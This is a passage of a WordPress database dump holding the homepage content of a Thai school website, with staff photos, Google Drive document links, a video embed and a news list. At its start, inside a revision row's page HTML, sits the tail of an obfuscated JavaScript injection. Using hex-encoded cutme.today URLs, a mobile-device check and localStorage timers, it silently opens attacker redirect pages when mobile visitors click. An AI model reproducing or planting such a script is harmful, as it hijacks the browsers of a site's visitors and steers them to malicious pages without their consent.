os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 14:58:29','2025-07-15 07:58:29','',19,'http://watprato.ssk.in.th/?p=694',0,'revision','',0),
(695,1,'2025-07-15 14:58:56','2025-07-15 07:58:56','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group 